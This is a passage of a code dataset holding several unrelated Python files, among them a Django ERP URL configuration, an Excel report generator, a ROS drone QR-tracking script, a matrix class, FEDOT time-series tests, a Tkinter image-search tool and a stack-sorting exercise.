day in berlin_holidays)\n\n # grouping of jobsites into areas\n area_splits = np.cumsum(rng.randint(1,10,num_areas))\n area_splits = (area_splits.T / area_splits.max()*num_jobsites).astype(int)\n df[\"Ort\"] = df[\"Einsatzort\"].apply(lambda jobsite_id: np.argmax(area_splits>jobsite_id))\n\n offers = []\n for _ in range(len(df)):\n offers.append(\n rng.choice(range(num_employees), replace=False, size=rng.randint(1,6)).tolist()\n )\n\n df[\"Mitarbeiter ID\"] = offers\n\n\n train, test = train_test_split(df)\n \n train.to_csv(\n os.path.join(outdir, \"train.tsv\"),\n index=False,\n sep=\"\\t\"\n )\n test.to_csv(\n os.path.join(outdir, \"test_truth.tsv\"),\n index=False,\n sep=\"\\t\"\n )\n test[[\"Einsatzort\", \"Qualifikation\", \"Schicht\", \"Tag\", \"Wochentag\", \"Feiertag\", \"Ort\"]].to_csv(\n os.path.join(outdir, \"test_publish.tsv\"),\n index=False,\n sep=\"\\t\"\n )\n\n\nif __name__ == '__main__':\n main()","sub_path":"src/synthesize.py","file_name":"synthesize.py","file_ext":"py","file_size_in_byte":2264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"343214489","text":"\"\"\"MAB_ERP URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nfrom erp import api_views\n\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^erp/', include('erp.urls')),\n url(r'^login/$', api_views.login_api),\n url(r'^logout/$', api_views.logout_api),\n url(r'^settings/$', api_views.change_settings_api),\n url(r'^employee/$', api_views.employee__list_api),\n url(r'^employee/([0-9]+)/$', api_views.employee_api),\n url(r'^product/$', api_views.product__list_api),\n url(r'^product/([0-9]+)/$', api_views.product_api),\n url(r'^supplier/$', api_views.supplier__list_api),\n url(r'^supplier/([0-9]+)/$', api_views.supplier_api),\n url(r'^supply/$', api_views.supply__list_api),\n url(r'^supply/([0-9]+)/$', api_views.supply_api),\n url(r'^recipient/$', api_views.recipient__list_api),\n url(r'^recipient/([0-9]+)/$', api_views.recipient_api),\n url(r'^shipment/$', api_views.shipment__list_api),\n url(r'^shipment/([0-9]+)/$', api_views.shipment_api),\n url(r'^reports/([0-9]+)/$', api_views.reports_api),\n]\n","sub_path":"mab_erp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"620029257","text":"import os\nimport platform\nimport time\n\nimport jinja2\nimport pandas as pd\nfrom docxtpl import DocxTemplate\nfrom pandas import DataFrame\nfrom baoming.settings import MEDIA_URL, MEDIA_ROOT, BASE_DIR\nfrom webapp.controller.common import *\nfrom webapp.models import *\nimport xlrd\nimport xlutils.copy\nimport platform\nfrom webapp.utils.date_encoder import *\n\n\ndef reporter_chemical_not_list(student_infos=None):\n \"\"\"\n 非化学类的\n :return:\n \"\"\"\n try:\n document_root = os.path.join(BASE_DIR, 'document')\n filepath = document_root + \"/fujian04_excel_format.xlsx\"\n\n # system_type = platform.system()\n # if 'indows' in system_type:\n # filepath = \"D:/PycharmProjects/lelingzdy/baoming/webapp/utils/fujian04_excel_format.xlsx\"\n # else:\n # filepath = \"/opt/python3_space/lelingzdy/baoming/webapp/utils/fujian04_excel_format.xlsx\"\n original_data = pd.read_excel(filepath, encoding='utf-8')\n # rb打开该excel,formatting_info=True表示打开excel时并保存原有的格式\n rb = xlrd.open_workbook(filepath, formatting_info=True)\n # 创建一个可写入的副本\n wb = xlutils.copy.copy(rb)\n if not student_infos:\n student_infos = StudentInfo.objects.filter(confirm_status=1, chemical_worker=2)\n tmp_array = []\n if len(student_infos) > 0:\n tmp_num = 0\n for student in student_infos:\n identification_level = str(student.identification_level)\n if len(identification_level) > 0:\n identification_level = worker_level[str(student.identification_level)]\n else:\n identification_level = ''\n # 原证书编号\n original_certificate_number = student.original_certificate_number\n if original_certificate_number:\n pass\n else:\n original_certificate_number = \"\"\n\n # 文化程度\n education_degree = student.user_info.education_degree\n if education_degree:\n education_name = student.user_info.education_degree.education_name\n else:\n education_name = ''\n tmp_num = tmp_num + 1\n # tmp_dict = {'index': str(tmp_num),\n # 'r_e': student.user_info.real_name,\n # 'id_number': student.user_info.id_number,\n # 'sa': get_sex(student.user_info.sex),\n # 'school': student.user_info.middle_school,\n # 'f_occ': student.declaration_of_occupation,\n # 's_w_d': student.user_info.start_working_date,\n # 'id_level': identification_level,\n # 'jsll': '',\n # 'sjcz': '',\n # 'o_cer_num': original_certificate_number,\n # 'issuance_time': issuance_time}\n # tmp_list.append(tmp_dict)\n # 原级别\n primary_level = str(student.primary_level)\n if len(student.primary_level) > 0:\n primary_level = worker_level[str(student.primary_level)]\n else:\n primary_level = ''\n if student.user_info.start_working_date:\n start_working_date = date_encoder(student.user_info.start_working_date)\n else:\n start_working_date = ''\n\n if student.issuance_time:\n issuance_time = date_encoder(student.issuance_time)\n else:\n issuance_time = ''\n\n tmp_array.append([tmp_num,\n student.user_info.real_name,\n student.user_info.id_number,\n get_sex(student.user_info.sex),\n '',\n education_name,\n student.declaration_of_occupation,\n start_working_date,\n identification_level,\n '',\n '',\n '',\n original_certificate_number,\n issuance_time])\n num = 0\n print('len:::' + str(len(original_data)))\n for row in range(0, len(original_data)):\n if row > 3:\n out_sheet = wb.get_sheet(0)\n if num < len(tmp_array):\n set_out_cell(out_sheet, 0, row, tmp_array[num][0])\n set_out_cell(out_sheet, 1, row, tmp_array[num][1])\n set_out_cell(out_sheet, 2, row, tmp_array[num][2])\n set_out_cell(out_sheet, 3, row, tmp_array[num][3])\n set_out_cell(out_sheet, 4, row, tmp_array[num][4])\n set_out_cell(out_sheet, 5, row, tmp_array[num][5])\n set_out_cell(out_sheet, 6, row, tmp_array[num][6])\n set_out_cell(out_sheet, 7, row, tmp_array[num][7])\n set_out_cell(out_sheet, 8, row, tmp_array[num][8])\n set_out_cell(out_sheet, 9, row, tmp_array[num][9])\n set_out_cell(out_sheet, 10, row, tmp_array[num][10])\n set_out_cell(out_sheet, 11, row, tmp_array[num][11])\n set_out_cell(out_sheet, 12, row, tmp_array[num][12])\n set_out_cell(out_sheet, 13, row, tmp_array[num][13])\n else:\n set_out_cell(out_sheet, 0, row, num + 1)\n num = num + 1\n\n day_string = str(time.strftime('%Y/%m/%d', time.localtime(time.time())))\n file_root = MEDIA_ROOT + \"/files/\"\n day_files_path = file_root + 'reporter_chemical_not_list' + \"/files/\" + day_string\n if os.path.exists(day_files_path):\n pass\n else:\n os.makedirs(day_files_path)\n uuid_string = str(uuid.uuid4())\n file_day_files_path = day_files_path + \"/\" + uuid_string + \".xlsx\"\n wb.save(file_day_files_path)\n if os.path.exists(file_day_files_path):\n file_manage = FileManage()\n file_manage.file_name = \"非化工类学员报名表-\" + day_string\n file_manage.file_uuid = uuid_string\n file_manage.file_path = file_day_files_path\n file_manage.save()\n # 附件1 生成非化工类学员化名册成功,\n return str(file_manage.file_uuid)\n else:\n return None\n else:\n return None\n except Exception as e:\n print(e)\n raise e\n\n\ndef get_sex(value):\n \"\"\"\n 性别过滤器\n :param value:\n :return:\n \"\"\"\n return_value = ''\n if value == 'MALE':\n return_value = '男'\n if value == 'FEMALE':\n return_value = '女'\n if value == 'OTHER':\n return_value = '未填写'\n return return_value\n\n\ndef set_out_cell(out_sheet, col, row, value):\n \"\"\" Change cell value without changing formatting. \"\"\"\n\n def _getOutCell(out_sheet, colIndex, rowIndex):\n \"\"\" HACK: Extract the internal xlwt cell representation. \"\"\"\n row = out_sheet._Worksheet__rows.get(rowIndex)\n if not row: return None\n\n cell = row._Row__cells.get(colIndex)\n return cell\n\n # HACK to retain cell style.\n previousCell = _getOutCell(out_sheet, col, row)\n # END HACK, PART I\n\n out_sheet.write(row, col, value)\n\n # HACK, PART II\n if previousCell:\n newCell = _getOutCell(out_sheet, col, row)\n if newCell:\n newCell.xf_idx = previousCell.xf_idx\n","sub_path":"baoming/webapp/utils/reporter_chemical_not_list_format.py","file_name":"reporter_chemical_not_list_format.py","file_ext":"py","file_size_in_byte":8060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"558822117","text":"#!/usr/bin/env python\nimport sys\nimport rospy\nimport operator\nimport cv2\nimport zbar\nfrom PIL import Image\nimport numpy as np\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge, CvBridgeError\nfrom array import array\n\ndef callback_image(data):\n image = None\n bridge = CvBridge()\n try:\n image = bridge.imgmsg_to_cv2(data, \"bgr8\")\n except CvBridgeError as e:\n print(e)\n output = image.copy()\n\n height, width, channels = output.shape\n #print height, width, channels\n \n\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n # Uses PIL to convert the grayscale image into a ndary array that ZBar can understand.\n #image = Image.fromarray(gray)\n image = np.array (gray)\n #width, height = image.size\n width = 640\n height = 360\n\n #Transformamos el frame para despues escanear lo que detecta\n zbar_image = zbar.Image(width, height, 'Y800', image.tostring())\n\n # Scans the zbar image.\n scanner = zbar.ImageScanner()\n scanner.scan(zbar_image)\n # Prints data from image.\n for decoded in zbar_image:\n #print(\"Data: \",decoded.data)\n #print(\"Tipo: \",decoded.type)\n #print(\"Pos: \",decoded.location)\n\n # Dibujando Puntos\n puntos = decoded.location\n centro = puntos[0] \n d1 = (puntos[2][0] + puntos[3][0]) / 2\n d2 = (puntos[1][1] + puntos[2][1]) / 2\n\n # Centro QR Code (d1,d2)\n cv2.circle(output,(d1,d2), 5, (0,0,255), -1)\n\n # Centro Video Frame (c1,c2)\n c1 = 320\n c2 = 180\n cv2.circle(output,(c1,c2), 20, (0,90,255), -1)\n cv2.line(output,(c1,c2),(d1,d2),(0,0,255),5)\n\n print(\"Centro Frame :\",c1, \" \",c2)\n print(\"Centro QR code :\",d1, \" \",d2)\n # Movimientos\n if c1 < d1:\n print(\"Muevete a la derecha !!!\")\n if c1 > d1:\n print(\"Muevete a la izquierda !!!\")\n if c2 > d2:\n print(\"Muevete hacia arriba !!!\")\n if c2 < d2:\n print(\"Muevete hacia abajo !!!\")\n\n\n \n # Number of points in the convex hull\n n = len(puntos)\n \n # Draw the convext hull\n for j in range(0,n):\n cv2.line(output, puntos[j], puntos[ (j+1) % n], (255,0,0), 3)\n # Alineando al centro\n #if \n\n\n\n\n \n cv2.imshow(\"Image\", output)\n cv2.waitKey(3)\n\n\nif __name__ == '__main__':\n rospy.init_node('Track')\n rospy.Subscriber(\"/ardrone/front/image_raw\", Image, callback_image)\n rospy.spin()\n \ncv2.destroyAllWindows()","sub_path":"circle.py","file_name":"circle.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"314780631","text":"import json\nimport pdb\n\n\nclass Matrix:\n def __init__(self):\n self.rows = []\n self.N = 0\n self.M = 0\n # self.rows = [[80, 10, 0], [1, 2, 3]]\n\n def __mul__(self, mtx):\n if type(mtx) != type(self):\n raise TypeError(\"Matrix class not used to multiply\")\n\n if self.M != mtx.N:\n raise ArithmeticError(\n \"Dimensions of the matricies do not match and are unable to be multiplied.\"\n )\n\n # Create the matrix.\n C = Matrix()\n C.rows = []\n for _ in range(self.M):\n C.rows.append([0] * mtx.N)\n\n for i in range(len(self.rows)):\n for j in range(len(self.rows[0])):\n for k in range(len(mtx.rows[0])):\n C.rows[i][k] += self.rows[i][j] * mtx.rows[j][k]\n\n C.update()\n return C\n\n def __imul__(self, mtx):\n self = self * mtx\n return self\n\n def __str__(self):\n return \"N({}) x M({})\\n\".format(self.N, self.M) + \"\\n\".join(\n [\" \".join([\"{:3}\".format(val) for val in row]) for row in self.rows]\n )\n\n def __repr__(self):\n return self.rows\n\n def update(self):\n self.N = len(self.rows)\n self.M = len(self.rows[0])\n return True\n\n def load_file(self, filename):\n with open(filename, \"r\") as ftext:\n data = json.load(ftext)\n\n n_rank = data[\"n\"]\n m_rank = data[\"m\"]\n\n A = []\n col_idx = 0\n n_rows = 0\n\n # Iterate through the rows until the value is found.\n for i in range(0, m_rank - 1):\n next_row = data[\"rows\"][i + 1]\n while col_idx != next_row - 1:\n row = [0] * n_rank\n if n_rows == n_rank:\n break\n\n # Iterate through the columns populating the values.\n for k in range(0, n_rank):\n if k + 1 == data[\"cols\"][col_idx]:\n row[k] = data[\"vals\"][col_idx]\n col_idx += 1\n\n n_rows += 1\n A.append(row)\n self.rows = A\n self.update()\n return A\n\n def transpose(self):\n at = Matrix()\n at.rows = []\n\n for i in range(self.N):\n current_row = []\n for k in range(self.M):\n current_row.append(self.rows[k][i])\n at.rows.append(current_row)\n\n at.update()\n return at\n\n def transpose_file(self, filename, new_file):\n with open(filename, \"r\") as csr:\n data = json.load(csr)\n\n mapping = {}\n row = 0\n row_limit = data[\"rows\"][row]\n done = False\n\n for i in range(len(data[\"cols\"])):\n while i == row_limit and not done:\n if row == len(data[\"rows\"]) - 1:\n done = True\n row += 1\n break\n\n row += 1\n row_limit = data[\"rows\"][row]\n\n col = data[\"cols\"][i]\n if col in mapping:\n mapping[col].append((row, data[\"vals\"][i]))\n else:\n mapping[col] = [(row, data[\"vals\"][i])]\n \n\n\n new_row = []\n new_col = []\n new_val = []\n csr_data = sorted(mapping)\n\n sum = 0\n for key in csr_data:\n new_row.append(sum)\n sum += len(mapping[key])\n\n for val in mapping[key]:\n new_col.append(val[0])\n new_val.append(val[1])\n\n\n\n new_file_contents = {}\n new_file_contents[\"rows\"] = new_row\n new_file_contents[\"cols\"] = new_col\n new_file_contents[\"vals\"] = new_val\n\n with open(\"new_file.json\", \"w\") as nf:\n json.dump(new_file_contents, nf)\n\n \"\"\" \n TRIVIAL SOLUTION\n for i in range(1, len(data[\"rows\"] - 1)):\n row_stop = data[\"rows\"][i]\n\n while col_idx != row_stop: \n At[data[\"cols\"][col_idx]][row] = data[\"vals\"][col_idx]\n col_idx += 1\n \n row += 1\n \n return At\n \"\"\"\n return True\n\n\nm = Matrix()\nm.load_file(\"example_mtx_two.json\")\nprint(m)\n\nm.transpose_file(\"example_mtx_two.json\", \"new_file.json\")\ntranspose = m.transpose()\nprint(transpose)\n\n\n\"\"\"\nprint(m)\nprint()\nc = m * m\nprint(c)\n\"\"\"\n","sub_path":"matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":4367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"237019441","text":"import os\nimport pandas as pd\n\ndirectory = os.fsencode('./resources/raw')\n\nwriter = pd.ExcelWriter('./resources/output/orderIn60Miles.xlsx')\n\nfor file in os.listdir(directory):\n filename = os.fsdecode(file)\n if filename.endswith(\".xlsx\"):\n filename = os.path.join(directory, file).decode()\n city = file.decode().split('.')[0]\n print(city)\n df = pd.read_excel(filename)\n\n dist = df[\"Distance\"]\n distInRadius = list(filter(lambda x: (x <= 60), dist))\n orderInRadius = df[\"Order ID\"][0:len(distInRadius)]\n latInRadius = df[\"Lat\"][0:len(distInRadius)]\n lngInRadius = df[\"Lng\"][0:len(distInRadius)]\n\n data = {'Order ID': orderInRadius, 'Distance': distInRadius, 'Lat': latInRadius, 'Lng': lngInRadius}\n df2 = pd.DataFrame(data)\n\n df2.to_excel(writer, sheet_name=city)\n\nwriter.save()\n","sub_path":"data-tailor.py","file_name":"data-tailor.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"209483179","text":"import numpy as np\n\nfrom fedot.core.data.data import InputData\nfrom fedot.core.data.multi_modal import MultiModalData\nfrom fedot.core.operations.evaluation.operation_implementations.data_operations.ts_transformations import \\\n _prepare_target, _ts_to_table, _sparse_matrix\nfrom fedot.core.pipelines.node import PrimaryNode, SecondaryNode\nfrom fedot.core.pipelines.pipeline import Pipeline\nfrom fedot.core.repository.dataset_types import DataTypesEnum\nfrom fedot.core.repository.tasks import Task, TaskTypesEnum, TsForecastingParams\nfrom fedot.core.log import default_log\n\nwindow_size = 4\nforecast_length = 4\nlog = default_log(__name__)\n\n\ndef synthetic_univariate_ts():\n \"\"\" Method returns InputData for classical time series forecasting task \"\"\"\n task = Task(TaskTypesEnum.ts_forecasting,\n TsForecastingParams(forecast_length=forecast_length))\n # Simple time series to process\n ts_train = np.array([0, 10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130])\n ts_test = np.array([140, 150, 160, 170])\n\n # Prepare train data\n train_input = InputData(idx=np.arange(0, len(ts_train)),\n features=ts_train,\n target=ts_train,\n task=task,\n data_type=DataTypesEnum.ts)\n\n start_forecast = len(ts_train)\n end_forecast = start_forecast + forecast_length\n predict_input = InputData(idx=np.arange(start_forecast, end_forecast),\n features=ts_train,\n target=None,\n task=task,\n data_type=DataTypesEnum.ts)\n return train_input, predict_input, ts_test\n\n\ndef synthetic_with_exogenous_ts():\n \"\"\" Method returns InputData for time series forecasting task with\n exogenous variable \"\"\"\n task = Task(TaskTypesEnum.ts_forecasting,\n TsForecastingParams(forecast_length=forecast_length))\n\n # Time series with exogenous variable\n ts_train = np.array([0, 10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130])\n ts_exog = np.array([10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23])\n\n ts_test = np.array([140, 150, 160, 170])\n ts_test_exog = np.array([24, 25, 26, 27])\n\n # Indices for forecast\n start_forecast = len(ts_train)\n end_forecast = start_forecast + forecast_length\n\n # Input for source time series\n train_source_ts = InputData(idx=np.arange(0, len(ts_train)),\n features=ts_train, target=ts_train,\n task=task, data_type=DataTypesEnum.ts)\n predict_source_ts = InputData(idx=np.arange(start_forecast, end_forecast),\n features=ts_train, target=None,\n task=task, data_type=DataTypesEnum.ts)\n\n # Input for exogenous variable\n train_exog_ts = InputData(idx=np.arange(0, len(ts_train)),\n features=ts_exog, target=ts_train,\n task=task, data_type=DataTypesEnum.ts)\n predict_exog_ts = InputData(idx=np.arange(start_forecast, end_forecast),\n features=ts_test_exog, target=None,\n task=task, data_type=DataTypesEnum.ts)\n return train_source_ts, predict_source_ts, train_exog_ts, predict_exog_ts, ts_test\n\n\ndef test_ts_to_lagged_table():\n # Check first step - lagged transformation of features\n train_input, _, _ = synthetic_univariate_ts()\n\n new_idx, lagged_table = _ts_to_table(idx=train_input.idx,\n time_series=train_input.features,\n window_size=window_size)\n\n correct_lagged_table = ((0., 10., 20., 30.),\n (10., 20., 30., 40.),\n (20., 30., 40., 50.),\n (30., 40., 50., 60.),\n (40., 50., 60., 70.),\n (50., 60., 70., 80.),\n (60., 70., 80., 90.),\n (70., 80., 90., 100.),\n (80., 90., 100., 110.),\n (90., 100., 110., 120.))\n\n correct_new_idx = (4, 5, 6, 7, 8, 9, 10, 11, 12, 13)\n\n # Convert into tuple for comparison\n new_idx_as_tuple = tuple(new_idx)\n lagged_table_as_tuple = tuple(map(tuple, lagged_table))\n assert lagged_table_as_tuple == correct_lagged_table\n assert new_idx_as_tuple == correct_new_idx\n\n # Second step - processing for correct the target\n final_idx, features_columns, final_target = _prepare_target(idx=new_idx,\n features_columns=lagged_table,\n target=train_input.target,\n forecast_length=forecast_length)\n correct_final_idx = (4, 5, 6, 7, 8, 9, 10)\n correct_features_columns = ((0., 10., 20., 30.),\n (10., 20., 30., 40.),\n (20., 30., 40., 50.),\n (30., 40., 50., 60.),\n (40., 50., 60., 70.),\n (50., 60., 70., 80.),\n (60., 70., 80., 90.))\n\n correct_final_target = ((40., 50., 60., 70.),\n (50., 60., 70., 80.),\n (60., 70., 80., 90.),\n (70., 80., 90., 100.),\n (80., 90., 100., 110.),\n (90., 100., 110., 120.),\n (100., 110., 120., 130.))\n\n # Convert into tuple for comparison\n final_idx_as_tuple = tuple(final_idx)\n features_columns_as_tuple = tuple(map(tuple, features_columns))\n final_target_as_tuple = tuple(map(tuple, final_target))\n\n assert final_idx_as_tuple == correct_final_idx\n assert features_columns_as_tuple == correct_features_columns\n assert final_target_as_tuple == correct_final_target\n\n\ndef test_sparse_matrix():\n # Create lagged matrix for sparse\n train_input, _, _ = synthetic_univariate_ts()\n _, lagged_table = _ts_to_table(idx=train_input.idx,\n time_series=train_input.features,\n window_size=window_size)\n features_columns = _sparse_matrix(log, lagged_table)\n\n # assert if sparse matrix features less than half or less than another dimension\n assert features_columns.shape[0] == lagged_table.shape[0]\n assert features_columns.shape[1] <= lagged_table.shape[1]/2 or features_columns.shape[1] < lagged_table.shape[0]\n\n\ndef test_forecast_with_sparse_lagged():\n train_source_ts, predict_source_ts, train_exog_ts, predict_exog_ts, ts_test = synthetic_with_exogenous_ts()\n\n node_lagged = PrimaryNode('sparse_lagged')\n # Set window size for lagged transformation\n node_lagged.custom_params = {'window_size': window_size}\n\n node_final = SecondaryNode('linear', nodes_from=[node_lagged])\n pipeline = Pipeline(node_final)\n\n pipeline.fit(input_data=MultiModalData({'sparse_lagged': train_source_ts}))\n\n forecast = pipeline.predict(input_data=MultiModalData({'sparse_lagged': predict_source_ts}))\n is_forecasted = True\n\n assert is_forecasted\n\n\ndef test_forecast_with_exog():\n train_source_ts, predict_source_ts, train_exog_ts, predict_exog_ts, ts_test = synthetic_with_exogenous_ts()\n\n # Source data for lagged node\n node_lagged = PrimaryNode('lagged')\n # Set window size for lagged transformation\n node_lagged.custom_params = {'window_size': window_size}\n # Exogenous variable for exog node\n node_exog = PrimaryNode('exog_ts_data_source')\n\n node_final = SecondaryNode('linear', nodes_from=[node_lagged, node_exog])\n pipeline = Pipeline(node_final)\n\n pipeline.fit(input_data=MultiModalData({'exog_ts_data_source': train_exog_ts,\n 'lagged': train_source_ts}))\n\n forecast = pipeline.predict(input_data=MultiModalData({'exog_ts_data_source': predict_exog_ts,\n 'lagged': predict_source_ts}))\n prediction = np.ravel(np.array(forecast.predict))\n\n assert tuple(prediction) == tuple(ts_test)\n","sub_path":"test/unit/data_operations/test_time_series_operations.py","file_name":"test_time_series_operations.py","file_ext":"py","file_size_in_byte":8358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"624326669","text":"from sympy.physics.units import *\nfrom sympy import *\n\nM = var(\"mass\")\ng = 9.81 *m/s**2\n(d , h) = (1.5 *m , 2.5 *m)\n\nr = d/2\n\npprint(\"\\nv1 / (m/s):\")\nv1 = sqrt(2*g*h)\ntmp = v1\ntmp /= m/s\npprint(N(tmp,3))\n\nJ_S = M*r**2 / 4\nJ_A = J_S + M*r*r\n\nv2 = var(\"v2\")\n\neq = Eq(r*M*v1, J_A*v2/r)\n\nsol = solve(eq,v2)[0]\npprint(\"\\nv2 / (m/s):\")\ntmp = sol\ntmp /= m/s\npprint(N(tmp,3))\n","sub_path":"de/py/10.30.py","file_name":"10.30.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"214198771","text":"from tkinter import *\nfrom PIL import Image, ImageTk\n\nimport pyperclip as pc\nimport bingimage as bi\n\nfrom config import *\nfrom random import shuffle\n\nimport procman as pm\nfrom fuzzywuzzy import fuzz\n\nclass ItemListIterator:\n def __init__(self, itemlist):\n self.iterator = iter(itemlist)\n self.current = next(self.iterator)\n\n def getValue(self):\n return self.current\n\n def next(self):\n self.current = next(self.iterator)\n\ndef btn_found_fn(itemiter):\n btn_next_fn(itemiter)\n lbl_text = stringvars['lbl_text']\n lbl_text.set(int(lbl_text.get()) + 1)\n\ndef btn_next_fn(itemiter):\n itemiter.next()\n tbox_text = stringvars['tbox_text']\n tbox_text.set(itemiter.getValue().query())\n pc.copy(tbox_text.get())\n\ndef main_frame(root, itemiter):\n global stringvars\n rframe = Frame(root)\n #rframe.pack(fill=BOTH, expand=True)\n\n stringvars['tbox_text'] = StringVar()\n tbox_text = stringvars['tbox_text']\n tbox_text.set(itemiter.getValue().query())\n tbox = Entry(rframe, textvariable=tbox_text, width=40)\n tbox.grid(row = 0, columnspan=3, sticky=W+E)\n\n btn_cpy = Button(rframe, text='Copy Text', command=lambda: pc.copy(tbox_text.get()))\n btn_cpy.grid(row = 1, column = 0, sticky=W+E)\n\n btn_cpy_inum = Button(rframe, text='Copy Item Number', \\\n command= lambda: pc.copy(str(itemiter.getValue().itemnum)))\n btn_cpy_inum.grid(row = 1, column = 1, sticky=E+W)\n\n stringvars['lbl_text'] = StringVar()\n lbl_text = stringvars['lbl_text']\n lbl_text.set('0')\n lbl_items = Label(rframe, textvariable=lbl_text)\n lbl_items.grid(row=1, column=2, sticky=E+W)\n\n btn_found = Button(rframe, text='Found', \\\n command=lambda: btn_found_fn(itemiter))\n btn_found.grid(row = 2, column = 0, sticky=W+E)\n\n btn_next = Button(rframe, text='Next', \\\n command=lambda: btn_next_fn(itemiter))\n btn_next.grid(row = 2, column = 1, sticky=W+E)\n\n btn_quit = Button(rframe, text='Quit')\n btn_quit.grid(row = 2, column = 2, sticky=E+W)\n\n rframe.grid(row=0,column=0,sticky=N+W)\n \ndef get_next_picture(lbl_image, searchiter):\n search = bi.bingValueResult(next(searchiter))\n img = search.downloadImage()\n img = img.resize((300, 300))\n pho_current = ImageTk.PhotoImage(img)\n\n lbl_image.config(image = pho_current)\n lbl_image.photo = pho_current\n lbl_image.update()\n\n set_values(search)\n generate_ratio_values(search)\n\ndef set_values(result):\n global stringvars\n\n stringvars['host'].set(str(result.hostLocation()))\n stringvars['name'].set(str(result.name()))\n stringvars['link'].set(str(result.contentLink()))\n\ndef generate_ratio_values(result):\n global stringvars\n itm = itemiter.getValue()\n name = stringvars['name'].get()\n\n\n stringvars['ratios'].set('({}, {}, {})'.format( \\\n fuzz.UQRatio(itm.description, name), \\\n fuzz.UWRatio(itm.description, name), \\\n fuzz.partial_ratio(itm.description, name)))\n \n \ndef picture_frame(root):\n global stringvars, itemiter\n pframe = Frame(root)\n searchRes = None\n while True:\n searchRes = bi.imageSearch(itemiter.getValue().query())\n if searchRes.valueCount() != 0:\n break\n itemiter.next()\n \n searchiter = iter(searchRes.values())\n search = bi.bingValueResult(next(searchiter))\n img = search.downloadImage()\n img = img.resize((300, 300))\n pho_current = ImageTk.PhotoImage(img)\n \n lbl_image = Label(pframe, image=pho_current)\n lbl_image.photo = pho_current\n lbl_image.grid(row=0, column=0, rowspan=2, columnspan=2,sticky=N+S+E+W)\n\n btn_save = Button(pframe, text='Save')\n btn_save.grid(row=3, column=0, sticky=E+W)\n\n btn_next = Button(pframe, text='Next', command=\\\n lambda: get_next_picture(lbl_image,searchiter))\n btn_next.grid(row=3, column=1, sticky=E+W)\n\n iframe = Frame(root, bd=2, relief=SUNKEN)\n\n stringvars['host'] = StringVar(\"\")\n stringvars['name'] = StringVar(\"\")\n stringvars['link'] = StringVar(\"\")\n stringvars['ratios'] = StringVar(\"\")\n\n generate_ratio_values(search)\n set_values(search)\n tbox_name_text = stringvars['name']\n tbox_name = Entry(iframe, textvariable=tbox_name_text, width=40)\n tbox_name.grid(row=0, column=0, sticky=N+W+E)\n\n tbox_host_text = stringvars['host']\n tbox_host = Entry(iframe, textvariable=tbox_host_text, width=40)\n tbox_host.grid(row=1, column=0, sticky=N+W+E)\n\n tbox_link_text = stringvars['link']\n tbox_link = Entry(iframe, textvariable=tbox_link_text, width=40)\n tbox_link.grid(row=2, column=0, sticky=N+E+W)\n\n tbox_ratio_text = stringvars['ratios']\n tbox_ratio = Entry(iframe, textvariable=tbox_ratio_text, width=40)\n tbox_ratio.grid(row=3, column=0, sticky=N+E+W)\n\n pframe.grid(row=0, column=1, rowspan=2, sticky=N+W+E+S)\n iframe.grid(row=1, column=0, sticky=N+E+S+W)\n \n\nif __name__ == '__main__':\n global stringvars, itemiter\n itemlist = list(pm.getMissing())\n shuffle(itemlist)\n itemiter = ItemListIterator(itemlist)\n\n stringvars = {}\n\n root = Tk()\n #root.minsize(500, 200)\n\n #picture_frame(root)\n main_frame(root, itemiter)\n\n\n\n root.mainloop()\n","sub_path":"CostcoOld/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":5289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"441950142","text":"class Stack:\n def __init__(self):\n self.arr = []\n\n def isempty(self):\n if self.arr:\n return False\n else:\n return True\n\n def peek(self):\n if not self.isempty():\n return self.arr[-1]\n else:\n return None\n \n def pop(self):\n if not self.isempty():\n val = self.arr[-1]\n del(self.arr[-1])\n return val\n else:\n print('No element to delete')\n\n def push(self,x):\n self.arr.append(x)\n\n def printstack(self):\n if not self.isempty():\n for i in self.arr:\n print(i, end = ' ')\n print()\n else:\n print('Stack is empty')\n\n def sort(self):\n reserve = Stack()\n while not self.isempty():\n temp = self.pop()\n while not reserve.isempty() and reserve.peek() > temp:\n self.push(reserve.pop())\n reserve.push(temp)\n while not reserve.isempty():\n self.push(reserve.pop())\n\ndef main():\n stack = Stack()\n stack.push(6)\n stack.push(85)\n stack.push(3)\n stack.push(1)\n stack.push(10)\n stack.push(2)\n stack.printstack()\n stack.sort()\n stack.printstack()\n print(stack.peek())\n\nif __name__=='__main__':\n main() ","sub_path":"Chapter 